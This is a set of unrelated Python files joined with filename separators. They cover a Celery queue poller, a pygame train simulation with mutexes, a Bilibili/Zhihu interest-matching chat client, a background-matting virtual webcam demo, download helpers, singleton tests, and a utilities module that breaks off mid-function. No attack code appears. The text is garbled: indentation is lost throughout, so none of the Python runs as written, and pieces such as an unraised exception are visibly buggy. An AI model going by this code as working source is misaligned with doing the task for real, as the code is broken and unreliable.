"""
This function runs in a thread to periodically poll the queue.
We need to talk to redis and celery (which is slow and blocking),
so rather than figuring out what is queued on demand, we refresh it
every queue_poll_interval seconds and refer to the in-memory
results.
"""
global queue
global queue_poll_interval
while True:
newqueue = []
uniques = []
# Check redis
tasks = [json.loads(pending_task)['headers']
for pending_task in r.lrange('celery', 0, -1)]
for task in tasks:
t = literal_eval(task['argsrepr'])
print(task)
unique_ref = f"{t[0]}{t[1]}{t[2]}{t[3]}{t[4]}"
if unique_ref not in uniques:
uniques.append(unique_ref)
newqueue.append({
"distro": t[0],
"product": t[1],
"edition": t[2],
"version": t[3],
"build": t[4],
"status": "queued"
})
# Check celery
q = celery.control.inspect()
for subset in ["active", "reserved"]:
if eval(f"q.{subset}()"):
for _, v in eval(f"q.{subset}().items()"):
for item in v:
[distro, product, edition, version, build] = item['args']
unique_ref = f"{distro}{product}{edition}{version}{build}"
if unique_ref not in uniques:
uniques.append(unique_ref)
newqueue.append({
"distro": distro,
"product": product,
"edition": edition,
"version": version,
"build": build,
"status": "processing" if subset == "active" else "queued"
})
queue = newqueue
time.sleep(queue_poll_interval)
def main():
db.bootstrap()
thread = threading.Thread(target=monitor_queue)
thread.start()
app.run(threaded=True, host='0.0.0.0', port=5000)
if __name__ == "__main__":
main()
|
trab_atualizado.py
|
# -*- coding: utf-8 -*-
"""trab_atualizado.ipynb"""
import pygame, random
from pygame.locals import *
import threading
from threading import Lock
mutex1 = threading.Lock()
mutex2 = threading.Lock()
mutex3 = threading.Lock()
mutex4 = threading.Lock()
mutex5 = threading.Lock()
UP = 0
RIGHT = 1
DOWN = 2
LEFT = 3
pygame.init()
screen = pygame.display.set_mode((600,600))
pygame.display.set_caption('Trens')
clock = pygame.time.Clock()
class MyGame():
def __init__(self):
self.direction_verde = RIGHT
self.direction_roxo = RIGHT
self.direction_laranja = RIGHT
self.direction_azul = LEFT
self.trem_verde_pos = (100, 100)
self.trem_verde = pygame.Surface((10,10))
self.trem_verde.fill((0,255,0))
self.trem_roxo_pos = (200, 100)
self.trem_roxo = pygame.Surface((10,10))
self.trem_roxo.fill((128,0,255))
self.trem_laranja_pos = (300, 100)
self.trem_laranja = pygame.Surface((10,10))
self.trem_laranja.fill((255,128,0))
self.trem_azul_pos = (100, 200)
self.trem_azul = pygame.Surface((10,10))
self.trem_azul.fill((0,0,255))
self.t_v = threading.Thread(target=self.trem_verde_)
self.t_r = threading.Thread(target=self.trem_roxo_)
self.t_a = threading.Thread(target=self.trem_laranja_)
self.t_z = threading.Thread(target=self.trem_azul_)
self.t_v.start()
self.t_r.start()
self.t_a.start()
self.t_z.start()
# Direction according to position
# Movement according to position
def L1(self):
if self.direction_verde == UP:
self.trem_verde_pos = (self.trem_verde_pos[0], self.trem_verde_pos[1] - 10)
def L2(self):
if self.direction_verde == RIGHT:
self.trem_verde_pos = (self.trem_verde_pos[0] + 10, self.trem_verde_pos[1])
def L3(self):
if self.direction_verde == DOWN:
self.trem_verde_pos = (self.trem_verde_pos[0], self.trem_verde_pos[1] + 10)
if self.direction_roxo == UP:
self.trem_roxo_pos = (self.trem_roxo_pos[0], self.trem_roxo_pos[1] - 10)
def L4(self):
if self.direction_verde == LEFT:
self.trem_verde_pos = (self.trem_verde_pos[0] - 10, self.trem_verde_pos[1])
if self.direction_azul == RIGHT:
self.trem_azul_pos = (self.trem_azul_pos[0] + 10, self.trem_azul_pos[1])
def L5(self):
if self.direction_roxo == DOWN:
self.trem_roxo_pos = (self.trem_roxo_pos[0], self.trem_roxo_pos[1] + 10)
if self.direction_laranja == UP:
self.trem_laranja_pos = (self.trem_laranja_pos[0], self.trem_laranja_pos[1] - 10)
def L6(self):
if self.direction_roxo == LEFT:
self.trem_roxo_pos = (self.trem_roxo_pos[0] - 10, self.trem_roxo_pos[1])
if self.direction_azul == RIGHT:
self.trem_azul_pos = (self.trem_azul_pos[0] + 10, self.trem_azul_pos[1])
def L7(self):
if self.direction_roxo == RIGHT:
self.trem_roxo_pos = (self.trem_roxo_pos[0] + 10, self.trem_roxo_pos[1])
def L8(self):
if self.direction_laranja == RIGHT:
self.trem_laranja_pos = (self.trem_laranja_pos[0] + 10, self.trem_laranja_pos[1])
def L9(self):
if self.direction_laranja == DOWN:
self.trem_laranja_pos = (self.trem_laranja_pos[0], self.trem_laranja_pos[1] + 10)
def L10(self):
if self.direction_laranja == LEFT:
self.trem_laranja_pos = (self.trem_laranja_pos[0] - 10, self.trem_laranja_pos[1])
if self.direction_azul == RIGHT:
self.trem_azul_pos = (self.trem_azul_pos[0] + 10, self.trem_azul_pos[1])
def L11(self):
if self.direction_azul == UP:
self.trem_azul_pos = (self.trem_azul_pos[0], self.trem_azul_pos[1] - 10)
def L12(self):
if self.direction_azul == DOWN:
self.trem_azul_pos = (self.trem_azul_pos[0], self.trem_azul_pos[1] + 10)
def L13(self):
if self.direction_azul == LEFT:
self.trem_azul_pos = (self.trem_azul_pos[0] - 10, self.trem_azul_pos[1])
def trem_verde_(self):
if self.trem_verde_pos == (100, 100):
self.direction_verde = RIGHT
if self.trem_verde_pos == (200, 100):
self.direction_verde = DOWN
if self.trem_verde_pos == (200, 200):
self.direction_verde = LEFT
if self.trem_verde_pos == (100, 200):
self.direction_verde = UP
self.L1()
self.L2()
mutex1.acquire()
self.L3()
mutex2.acquire()
mutex1.release()
self.L4()
mutex2.release()
screen.fill((0,0,0))
screen.blit(self.trem_verde, self.trem_verde_pos)
screen.blit(self.trem_roxo, self.trem_roxo_pos)
screen.blit(self.trem_laranja, self.trem_laranja_pos)
screen.blit(self.trem_azul, self.trem_azul_pos)
def trem_roxo_(self):
if self.trem_roxo_pos == (200, 100):
self.direction_roxo = RIGHT
if self.trem_roxo_pos == (300, 100):
self.direction_roxo = DOWN
if self.trem_roxo_pos == (300, 200):
self.direction_roxo = LEFT
if self.trem_roxo_pos == (200, 200):
self.direction_roxo = UP
self.L7()
mutex4.acquire()
self.L5()
mutex3.acquire()
mutex4.release()
self.L6()
mutex1.acquire()
mutex3.release()
self.L3()
mutex1.release()
screen.fill((0,0,0))
screen.blit(self.trem_verde, self.trem_verde_pos)
screen.blit(self.trem_roxo, self.trem_roxo_pos)
screen.blit(self.trem_laranja, self.trem_laranja_pos)
screen.blit(self.trem_azul, self.trem_azul_pos)
def trem_laranja_(self):
if self.trem_laranja_pos == (300, 100):
self.direction_laranja = RIGHT
if self.trem_laranja_pos == (400, 100):
self.direction_laranja = DOWN
if self.trem_laranja_pos == (400, 200):
self.direction_laranja = LEFT
if self.trem_laranja_pos == (300, 200):
self.direction_laranja = UP
self.L8()
self.L9()
mutex5.acquire()
self.L10()
mutex4.acquire()
mutex5.release()
self.L5()
mutex4.release()
screen.fill((0,0,0))
screen.blit(self.trem_verde, self.trem_verde_pos)
screen.blit(self.trem_roxo, self.trem_roxo_pos)
screen.blit(self.trem_laranja, self.trem_laranja_pos)
screen.blit(self.trem_azul, self.trem_azul_pos)
def trem_azul_(self):
if self.trem_azul_pos == (100, 200):
self.direction_azul = RIGHT
if self.trem_azul_pos == (400, 200):
self.direction_azul = DOWN
if self.trem_azul_pos == (400, 300):
self.direction_azul = LEFT
if self.trem_azul_pos == (100, 300):
self.direction_azul = UP
mutex3.acquire()
mutex2.acquire()
mutex5.acquire()
self.L4()
mutex2.release()
self.L6()
mutex3.release()
self.L10()
mutex5.release()
self.L12()
self.L13()
self.L11()
screen.fill((0,0,0))
screen.blit(self.trem_verde, self.trem_verde_pos)
screen.blit(self.trem_roxo, self.trem_roxo_pos)
screen.blit(self.trem_laranja, self.trem_laranja_pos)
screen.blit(self.trem_azul, self.trem_azul_pos)
if __name__ == '__main__':
mygame = MyGame()
while True:
clock.tick(10)
for event in pygame.event.get():
if event.type == QUIT:
pygame.quit()
mygame.trem_roxo_()
mygame.trem_verde_()
mygame.trem_laranja_()
mygame.trem_azul_()
pygame.draw.rect(screen, (255,255,255), [100, 100, 100, 100], 5)
pygame.draw.rect(screen, (255,255,255), [200, 100, 100, 100], 5)
pygame.draw.rect(screen, (255,255,255), [300, 100, 100, 100], 5)
pygame.draw.rect(screen, (255,255,255), [100, 200, 300, 100], 5)
pygame.display.update()
|
client_main.py
|
import threading
import time
import requests
import sys
import json
import os
import jieba.analyse
from PyQt5 import QtCore, QtGui, QtWidgets
import pickle
from Spiders.bilibili.spider import Bilibili
from Spiders.zhihu.spider import Zhihu
from tools.helper import LoginHelper
from Chat import chat_client
pickle_file = 'pickle.pkl'
bilibili_history = []
bilibili_users = []
def bilibili_run():
global bilibili_history
global bilibili_users
login_helper = LoginHelper()
login_helper.login(Bilibili.login_url)
bilibili = Bilibili(login_helper.get_cookies(), login_helper.get_driver())
bilibili_history = bilibili.get_user_history(max_history_record=500)
bilibili_users = bilibili.get_following_user()
login_helper.driver.quit()
zhihu_following_topics = []
zhihu_related_questions = []
zhihu_following_questions = []
server_ip = '127.0.0.1:8899'
id_str = ''
def zhihu_run():
global zhihu_following_questions
global zhihu_following_topics
global zhihu_related_questions
zhihu_login_helper = LoginHelper()
zhihu_login_helper.login(Zhihu.login_url)
zhihu = Zhihu(zhihu_login_helper.get_cookies(), zhihu_login_helper.get_driver())
zhihu_following_questions = zhihu.get_following_questions()
zhihu_following_topics = zhihu.get_following_topics()
zhihu_related_questions = zhihu.get_related_questions(100)
zhihu_login_helper.driver.quit()
def heartbeat_run():
assert id_str
while True:
requests.post('http://{}/heartbeat'.format(server_ip), id_str)
time.sleep(3)
def is_yes(s):
s = s.strip().upper()
if s == 'YES' or s == 'Y':
return True
return False
if __name__ == '__main__':
port = int(sys.argv[1])
chat_client.LISTEN_PORT = port
app = QtWidgets.QApplication(sys.argv)
window = chat_client.ExampleApp()
window.listen_in_thread()
window.show()
# If the data has already been crawled within the last 3 days, read the pickle file directly
if os.path.exists(pickle_file) and time.time() - os.path.getmtime(pickle_file) < 60*60*25*3:
pkl_file = open(pickle_file, 'rb')
user_profile = pickle.load(pkl_file)
pkl_file.close()
# Otherwise, crawl the data again
else:
bilibili_thread = threading.Thread(target=bilibili_run)
bilibili_thread.start()
zhihu_thread = threading.Thread(target=zhihu_run)
zhihu_thread.start()
bilibili_thread.join()
zhihu_thread.join()
# Extract keywords
corpus = ''
for que in zhihu_related_questions + zhihu_following_questions:
corpus += '。' + que
question_keyword = jieba.analyse.textrank(corpus)
corpus = ''
for history in bilibili_history:
corpus += '。' + history
video_keyword = jieba.analyse.textrank(corpus)
topics = zhihu_following_topics
video_up = bilibili_users
user_profile = {
'question_keyword': question_keyword,
'video_keyword': video_keyword,
'topics': topics,
'video_up': video_up
}
with open(pickle_file, 'wb') as f:
pickle.dump(user_profile, f)
# print('user_profile', user_profile)
resp = requests.post('http://{}/signin?port={}'.format(server_ip, port), json.dumps(user_profile))
id_str = resp.content.decode()
# Send heartbeats to the server
heartbeat_thread = threading.Thread(target=heartbeat_run)
heartbeat_thread.daemon = True
heartbeat_thread.start()
while True:
s = input('Do you want to connect to a random user? [Y/N] (N to exit)')
if is_yes(s):
# Get a randomly matched user / a user with similar interests
resp = requests.post('http://{}/hello'.format(server_ip), id_str)
peer = json.loads(resp.content.decode())
print(peer)
if 'common' not in peer:
print(peer[0])
s = input('Do you want to exit? [Y/N]')
if is_yes(s):
break
else:
chat_client.client_ip = peer['ip']
chat_client.CONNECT_PORT = int(peer['port'])
intro = ''
for k in peer['common'].keys():
intro += k + ': '
for t in peer['common'][k]:
intro += t + ', '
intro += '\n\n'
window.connect_to()
# Tell the user about the shared interests
shard_num = (len(intro.encode(encoding="utf-8"))+4096) // 4096
shard_size = len(intro) // shard_num
for i in range(shard_num):
window.send(intro[i*shard_size: (i+1)*shard_size])
# window.send(intro)
sys.exit(app.exec())
else:
break
exit()
|
demo_webcam.py
|
"""
Videoconferencing plugin demo for Linux.
v4l2loopback-utils needs to be installed, and a virtual webcam needs to be running at `--camera-device` (default: /dev/video1).
A target image and background should be supplied (default: demo_image.png and demo_video.mp4)
Once launched, the script is in background collection mode. Exit the frame and click to collect a background frame.
Upon returning, cycle through different target backgrounds by clicking.
Press Q any time to exit.
Example:
python demo_webcam.py --model-checkpoint "PATH_TO_CHECKPOINT" --resolution 1280 720 --hide-fps
"""
import argparse, os, shutil, time
import numpy as np
import cv2
import torch
from torch import nn
from torch.utils.data import Dataset, DataLoader
from torchvision.transforms import Compose, ToTensor, Resize
from torchvision.transforms.functional import to_pil_image
from threading import Thread, Lock
from tqdm import tqdm
from PIL import Image
import pyfakewebcam # pip install pyfakewebcam
# --------------- App setup ---------------
app = {
"mode": "background",
"bgr": None,
"bgr_blur": None,
"compose_mode": "plain",
"target_background_frame": 0
}
# --------------- Arguments ---------------
parser = argparse.ArgumentParser(description='Virtual webcam demo')
parser.add_argument('--model-backbone-scale', type=float, default=0.25)
parser.add_argument('--model-checkpoint', type=str, required=True)
parser.add_argument('--model-refine-mode', type=str, default='sampling', choices=['full', 'sampling', 'thresholding'])
parser.add_argument('--model-refine-sample-pixels', type=int, default=80_000)
parser.add_argument('--model-refine-threshold', type=float, default=0.7)
parser.add_argument('--hide-fps', action='store_true')
parser.add_argument('--resolution', type=int, nargs=2, metavar=('width', 'height'), default=(1280, 720))
parser.add_argument('--target-video', type=str, default='./demo_video.mp4')
parser.add_argument('--target-image', type=str, default='./demo_image.jpg')
parser.add_argument('--camera-device', type=str, default='/dev/video1')
args = parser.parse_args()
# ----------- Utility classes -------------
# A wrapper that reads data from cv2.VideoCapture in its own thread to optimize.
# Use .read() in a tight loop to get the newest frame
class Camera:
def __init__(self, device_id=0, width=1280, height=720):
self.capture = cv2.VideoCapture(device_id)
self.capture.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.capture.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.capture.set(cv2.CAP_PROP_FOURCC, cv2.VideoWriter_fourcc(*'MJPG'))
self.width = int(self.capture.get(cv2.CAP_PROP_FRAME_WIDTH))
self.height = int(self.capture.get(cv2.CAP_PROP_FRAME_HEIGHT))
# self.capture.set(cv2.CAP_PROP_BUFFERSIZE, 2)
self.success_reading, self.frame = self.capture.read()
self.read_lock = Lock()
self.thread = Thread(target=self.__update, args=())
self.thread.daemon = True
self.thread.start()
def __update(self):
while self.success_reading:
grabbed, frame = self.capture.read()
with self.read_lock:
self.success_reading = grabbed
self.frame = frame
def read(self):
with self.read_lock:
frame = self.frame.copy()
return frame
def __exit__(self, exec_type, exc_value, traceback):
self.capture.release()
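# Usage sketch (illustrative, not part of the original demo): the background thread keeps
# self.frame updated, so callers just poll read() for the newest frame without blocking.
#   cam = Camera(device_id=0, width=1280, height=720)
#   frame = cam.read()  # latest BGR frame as a numpy array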
# An FPS tracker that computes an exponentially moving average FPS
class FPSTracker:
def __init__(self, ratio=0.5):
self._last_tick = None
self._avg_fps = None
self.ratio = ratio
def tick(self):
if self._last_tick is None:
self._last_tick = time.time()
return None
t_new = time.time()
fps_sample = 1.0 / (t_new - self._last_tick)
self._avg_fps = self.ratio * fps_sample + (1 - self.ratio) * self._avg_fps if self._avg_fps is not None else fps_sample
self._last_tick = t_new
return self.get()
def get(self):
return self._avg_fps
# Wrapper for playing a stream with cv2.imshow(). It can accept an image and return keypress info for basic interactivity.
# It also tracks FPS and optionally overlays info onto the stream.
class Displayer:
def __init__(self, title, width=None, height=None, show_info=True):
self.title, self.width, self.height = title, width, height
self.show_info = show_info
self.fps_tracker = FPSTracker()
self.webcam = None
cv2.namedWindow(self.title, cv2.WINDOW_NORMAL)
if width is not None and height is not None:
cv2.resizeWindow(self.title, width, height)
# Update the currently showing frame and return key press char code
def step(self, image):
fps_estimate = self.fps_tracker.tick()
if self.show_info and fps_estimate is not None:
message = f"{int(fps_estimate)} fps | {self.width}x{self.height}"
cv2.putText(image, message, (10, 40), cv2.FONT_HERSHEY_SIMPLEX, 1.0, (0, 0, 0))
if self.webcam is not None:
image_web = np.ascontiguousarray(image, dtype=np.uint8) # .copy()
image_web = cv2.cvtColor(image_web, cv2.COLOR_RGB2BGR)
self.webcam.schedule_frame(image_web)
# else:
cv2.imshow(self.title, image)
return cv2.waitKey(1) & 0xFF
class Controller: # A cv2 window with a couple buttons for background capture and cycling through target background options
def __init__(self):
self.name = "RTHRBM Control"
self.controls = [
{
"type": "button",
"name": "mode_switch",
"label": "Grab background",
"x": 50,
"y": 20,
"w": 300,
"h": 40
},
{
"type": "button",
"name": "compose_switch",
"label": "Compose: plain white",
"x": 50,
"y": 100,
"w": 300,
"h": 40
}
]
cv2.namedWindow(self.name)
cv2.moveWindow(self.name, 200, 200)
cv2.setMouseCallback(self.name, self._raw_process_click)
self.render()
def render(self):
control_image = np.zeros((160,400), np.uint8)
for button in self.controls:
control_image[button["y"]:button["y"] + button["h"],button["x"]:button["x"] + button["w"]] = 180
cv2.putText(control_image, button["label"], (button["x"] + 10, button["y"] + button["h"] // 2 ), cv2.FONT_HERSHEY_SIMPLEX, 0.5, 0, 1)
cv2.imshow(self.name, control_image)
def clicked(self, control):
if control["name"] == "mode_switch":
if app["mode"] == "background":
grab_bgr()
app["mode"] = "stream"
control["label"] = "Select another background"
else:
app["mode"] = "background"
control["label"] = "Grab background"
elif control["name"] == "compose_switch":
cycle = [("plain", "Compose: plain white"), ("gaussian", "Compose: blur background"), ("video", "Compose: Winter holidays"), ("image", "Compose: Mt. Rainier")]
current_idx = next(i for i, v in enumerate(cycle) if v[0] == app["compose_mode"])
next_idx = (current_idx + 1) % len(cycle)
app["compose_mode"] = cycle[next_idx][0]
control["label"] = cycle[next_idx][1]
self.render()
def _raw_process_click(self, event, x, y, flags, params):
if event == cv2.EVENT_LBUTTONDOWN:
for control in self.controls:
if x > control["x"] and x < control["x"] + control["w"] and y > control["y"] and y < control["y"] + control["h"]:
self.clicked(control)
class VideoDataset(Dataset):
def __init__(self, path: str, transforms: any = None):
self.cap = cv2.VideoCapture(path)
self.transforms = transforms
self.width = int(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH))
self.height = int(self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT))
self.frame_rate = self.cap.get(cv2.CAP_PROP_FPS)
self.frame_count = int(self.cap.get(cv2.CAP_PROP_FRAME_COUNT))
def __len__(self):
return self.frame_count
def __getitem__(self, idx):
if isinstance(idx, slice):
return [self[i] for i in range(*idx.indices(len(self)))]
if self.cap.get(cv2.CAP_PROP_POS_FRAMES) != idx:
self.cap.set(cv2.CAP_PROP_POS_FRAMES, idx)
ret, img = self.cap.read()
if not ret:
raise IndexError(f'Idx: {idx} out of length: {len(self)}')
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = Image.fromarray(img)
if self.transforms:
img = self.transforms(img)
return img
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_traceback):
self.cap.release()
# --------------- Main ---------------
# Load model
model = torch.jit.load(args.model_checkpoint)
model.backbone_scale = args.model_backbone_scale
model.refine_mode = args.model_refine_mode
model.refine_sample_pixels = args.model_refine_sample_pixels
model.refine_threshold = args.model_refine_threshold
model.cuda().eval()
width, height = args.resolution
cam = Camera(width=width, height=height)
dsp = Displayer('RTHRBM Preview', cam.width, cam.height, show_info=(not args.hide_fps))
ctr = Controller()
fake_camera = pyfakewebcam.FakeWebcam(args.camera_device, cam.width, cam.height)
dsp.webcam = fake_camera
def cv2_frame_to_cuda(frame):
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
return ToTensor()(Image.fromarray(frame)).unsqueeze_(0).cuda()
preloaded_image = cv2_frame_to_cuda(cv2.imread(args.target_image))
tb_video = VideoDataset(args.target_video, transforms=ToTensor())
def grab_bgr():
bgr_frame = cam.read()
bgr_blur = cv2.GaussianBlur(bgr_frame.astype('float32'), (67, 67), 0).astype('uint8') # cv2.blur(bgr_frame, (10, 10))
app["bgr"] = cv2_frame_to_cuda(bgr_frame)
app["bgr_blur"] = cv2_frame_to_cuda(bgr_blur)
def app_step():
if app["mode"] == "background":
frame = cam.read()
key = dsp.step(frame)
if key == ord('q'):
return True
else:
frame = cam.read()
src = cv2_frame_to_cuda(frame)
pha, fgr = model(src, app["bgr"])[:2]
if app["compose_mode"] == "plain":
tgt_bgr = torch.ones_like(fgr)
elif app["compose_mode"] == "image":
tgt_bgr = nn.functional.interpolate(preloaded_image, (fgr.shape[2:]))
elif app["compose_mode"] == "video":
vidframe = tb_video[app["target_background_frame"]].unsqueeze_(0).cuda()
tgt_bgr = nn.functional.interpolate(vidframe, (fgr.shape[2:]))
app["target_background_frame"] += 1
elif app["compose_mode"] == "gaussian":
tgt_bgr = app["bgr_blur"]
res = pha * fgr + (1 - pha) * tgt_bgr
res = res.mul(255).byte().cpu().permute(0, 2, 3, 1).numpy()[0]
res = cv2.cvtColor(res, cv2.COLOR_RGB2BGR)
key = dsp.step(res)
if key == ord('q'):
return True
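# Illustrative sketch, not part of the original script: app_step() composites with the
# standard alpha-matting equation  result = alpha * foreground + (1 - alpha) * background.
# The helper below only demonstrates that equation on dummy tensors; the function name and
# tensor values are hypothetical, and it assumes the torch import at the top of this script.
def _compositing_example():
    fgr = torch.rand(1, 3, 4, 4)      # foreground colours in [0, 1], NCHW layout
    pha = torch.rand(1, 1, 4, 4)      # alpha matte, broadcast over the colour channels
    tgt_bgr = torch.ones_like(fgr)    # plain white replacement background
    res = pha * fgr + (1 - pha) * tgt_bgr
    return res.mul(255).byte()        # same uint8 conversion app_step() performs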
with torch.no_grad():
while True:
if app_step():
break
|
utils.py
|
import subprocess, os, os.path, yaml, shlex, re, urllib.parse, shutil, urllib.request, threading
def exe(cmd):
if type(cmd) != type([]):
cmd = shlex.split(cmd)
return subprocess.Popen(cmd)
def exe_pipes(cmd):
if type(cmd) != type([]):
cmd = shlex.split(cmd)
return subprocess.Popen(cmd, stdout = subprocess.PIPE, stderr = subprocess.PIPE)
def exe_flos(cmd, fout, ferr):
if type(cmd) != type([]):
cmd = shlex.split(cmd)
out = open(fout, "w") #io.StringIO()
err = open(ferr, "w") #io.StringIO()
return subprocess.Popen(cmd, stdout = out, stderr = err), out, err
def dw_file_to(url, path, callback):
"""Saves file from url to path
"""
#with urllib.request.urlopen(url) as response, open(path, 'wb') as out_file:
# shutil.copyfileobj(response, out_file)
urllib.request.urlretrieve(url, path, callback)
def set_dir(directory, create=True):
if os.path.isdir(directory):
return directory
else:
if create:
os.makedirs(directory)
return directory
else:
raise Exception("Tried to assign invalid directory: \"%s\"" % directory)
def set_file(f, create=True):
if os.path.isfile(f):
return f
else:
if create:
open(f, 'wb').close()
return f
else:
Exception("Tried to assign invalid file: \"%s\"" % f)
def write_to_file(path, content):
fd = open(path, "w")
fd.write(content)
fd.close()
def get_url_info(url):
"""Retrieves information about given url
"""
settings = load_config()
try:
download_link_getter = exe_pipes(
'plowdown --9kweu ' +
settings["captcha-api-key"] +
' -v1 --skip-final --printf "%%f%%n%%d" %s' % url
)
stdout, stderr = download_link_getter.communicate()
res_list = stdout.decode("utf8").split("\n")
res_err = stderr.decode("utf8")
retc = download_link_getter.returncode
except:
# nasty hack to try to download file directly if plowshare is not installed (TODO: make this better!)
res_list = []
retc = 2
res_err = ''
return url, res_list, res_err, retc
def parse_url_info(url, res_list, res_err, retc):
"""Parses information about given url, returns false on error
"""
if len(res_list) != 3:
if retc == 2 or retc == 0: # -> No available module or something weird (e.g. ftp)
fname = url_to_filename(url)
if len(fname) != 0:
# download file directly
return fname, url
print(
"Error while getting link info: " +
repr(res_err) +
" (" +
str(retc) +
")"
)
return False
else:
return res_list[0], res_list[1]
def load_file(url, path, callback):
"""Downloads url to file.
Returns (False, False) on success, otherwise (True, <x>)
If <x> is True this is considered to be a fatal error, link will be skipped
If <x> is False this link will be retried.
"""
print("Saving '%s' to '%s'" % (url, path))
try:
dw_file_to(url, path, callback)
except Exception as e:
print("Error while downloading: " + str(e))
# check for fatal error
        if getattr(e, "code", None) == 404:  # only urllib's HTTPError carries a status code
return (None, True)
return (True, False)
else:
return (False, False)
def set_config_path(path):
global config_path
config_path = path
def load_config():
# set_config_path(..) *must* be called by now
if os.path.isfile(config_path):
        return yaml.safe_load(open(config_path, "r"))
else:
# return defaults
print('No config file present, creating default one (path: %s)' % config_path)
create_default_config(config_path)
try:
            return yaml.safe_load(open(config_path, "r"))
except:
raise Exception('[FATAL] - Could not create config (path: %s)' % config_path)
def create_default_config(path='./config.yaml'):
basic_conf = {
'download-dir': 'downloads',
'captcha-api-key': 'xyz',
'port': 50505,
'parallel-download-num': 1
}
yaml.dump(basic_conf, open(path, 'w'), default_flow_style=False)
def clean_links(raw_data):
return re.findall('(?:ftp|https|http)?://(?:[a-zA-Z]|[0-9]|[$-_@.&+~]|[!*\(\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', raw_data)
def url_to_filename(url):
res = urllib.parse.urlparse(url)
return os.path.basename(res.path)
def sizeof_fmt(num):
for x in ['bytes','KB','MB','GB']:
if num < 1024.0:
return "%3.1f%s" % (num, x)
num /= 1024.0
return "%3.1f%s" % (num, 'TB')
def start_thread(func, callback=None):
thread = threading.Thread(target=func, kwargs={'on_finish': callback})
thread.daemon = True
thread.start()
def get_user_dir():
return os.path.expanduser('~')
def get_application_dir():
return set_dir(os.path.join(get_user_dir(), '.ploader'))
|
test_singleton.py
|
# -*- coding: utf-8; -*-
from ..syntax import macros, test, test_raises, the # noqa: F401
from ..test.fixtures import session, testset, returns_normally
import pickle
import gc
import threading
from queue import Queue
from ..singleton import Singleton
from ..misc import slurp
from ..it import allsame
# For testing. Defined at the top level to allow pickling.
class Foo(Singleton):
pass
class Bar(Foo):
pass
class Baz(Singleton):
def __init__(self, x=42):
self.x = x
class Qux(Baz):
def __getstate__(self):
return None
# TODO: coverage says this is never actually called. Maybe the data in the
# pickle file knows that `__getstate__` returned `None`, and `loads` skips
# calling `__setstate__`?
def __setstate__(self, state):
return
def runtests():
with testset("basic usage"):
# IMPORTANT: be sure to keep the reference to the object instance the constructor
# gives you. This is the only time you'll see it.
foo = Foo()
test_raises[TypeError, Foo(), "should have errored out, a Foo already exists"]
del foo # deleting the only strong reference kills the Foo instance from the singleton instances
gc.collect() # Need to request garbage collection on PyPy, because otherwise no guarantee when it'll happen.
test[returns_normally(Foo())] # so now it's ok to create a new Foo
# another class that inherits from a singleton class
bar = Bar() # noqa: F841, our strong reference keeps the object alive while testing.
test_raises[TypeError, Bar(), "should have errored out, a Bar already exists"]
with testset("pickling"):
# TODO: FIXME: This module is not the real "__main__" when running under the `macropython` wrapper.
# We HACK this for now so that these pickling tests can run. Not quite sure whether `macropython` even
# should attempt to overwrite `sys.modules["__main__"]` with the "main" module it imports; doing
# that might just break something.
import sys
sys.modules["__main__"].Baz = Baz
sys.modules["__main__"].Qux = Qux
# pickling: basic use
baz = Baz(17)
s = pickle.dumps(baz)
baz2 = pickle.loads(s)
test[the[baz2 is baz]] # it's the same instance
# pickling: by default (if no custom `__getstate__`/`__setstate__`),
# the state of the singleton object is restored (overwritten!) upon
# unpickling it.
baz.x = 23
test[baz.x == 23]
baz2 = pickle.loads(s)
test[the[baz2 is baz]] # again, it's the same instance
test[baz.x == 17] # but unpickling has overwritten the state
# With custom no-op `__getstate__` and `__setstate__`, the existing
# singleton instance's state remains untouched even after unpickling an
# instance of that singleton. This strategy may be useful when defining
# singletons which have no meaningful state to serialize/deserialize.
qux = Qux(17)
s = pickle.dumps(qux)
qux.x = 23
qux2 = pickle.loads(s)
test[the[qux2 is qux]] # it's the same instance
test[qux.x == 23] # and unpickling didn't change the state
with testset("thread safety"):
with test: # just interested that it runs to completion
class Quux(Singleton):
pass
que = Queue()
def worker():
try:
que.put(Quux())
except TypeError:
pass
n = 1000
threads = [threading.Thread(target=worker) for _ in range(n)]
for t in threads:
t.start()
for t in threads:
t.join()
lst = slurp(que)
test[len(lst) == 1]
# TODO: These must be outside the `with test` because a test block
# implicitly creates a function (whence a local scope).
s = pickle.dumps(baz)
del baz
gc.collect()
with test:
que = Queue()
def worker():
try:
que.put(pickle.loads(s)) # let's race!
except TypeError: # pragma: no cover
que.put(None)
n = 1000
threads = [threading.Thread(target=worker) for _ in range(n)]
for t in threads:
t.start()
for t in threads:
t.join()
lst = slurp(que)
test[the[len(lst)] == the[n]]
test[all(x is not None for x in lst)]
test[allsame(lst)]
if __name__ == '__main__': # pragma: no cover
with session(__file__):
runtests()
|
utils.py
|
import importlib.machinery
import logging
import shutil
from multiprocessing import Process, Queue, Pool
import random
import re
import string
def import_by_filename(name, module_path):
"""
Import module by path. Module would appear in sys.modules
:param name: str The name of the module that this loader will handle.
:param module_path: str The path to the source file.
:return:
"""
return importlib.machinery.SourceFileLoader(name, module_path).load_module()
def clean_experiment_folder(folder):
"""Remove subdirectories and files below. Should be used when flexp is setup to clean experiment folder
:param str folder:
"""
import os
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
elif os.path.isdir(file_path):
shutil.rmtree(file_path)
except Exception as e:
print(e)
def merge_dicts(a, b, path=None, conflict_operation=None):
"""
Merges b into a
:param dict a:
:param dict b:
:param None|list path: Path in dict structure
:param conflict_operation:
:return dict
"""
if path is None:
path = []
for key in b:
if key in a:
if isinstance(a[key], dict) and isinstance(b[key], dict):
merge_dicts(a[key], b[key], path + [str(key)],
conflict_operation)
else:
try:
# same leaf value for numpy
if (a[key] == b[key]).all():
continue
except:
pass
try:
# same leaf value
if a[key] == b[key]:
continue
except:
pass
if not conflict_operation:
raise ValueError(
'Conflict at %s' % '.'.join(path + [str(key)]))
else:
a[key] = conflict_operation(a[key], b[key])
else:
a[key] = b[key]
return a
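# Illustrative usage, not part of the original module: merging two nested dicts. Note that
# `a` is modified in place and also returned; without a conflict_operation a differing leaf
# raises ValueError. The function name and sample dicts below are hypothetical.
def _merge_dicts_example():
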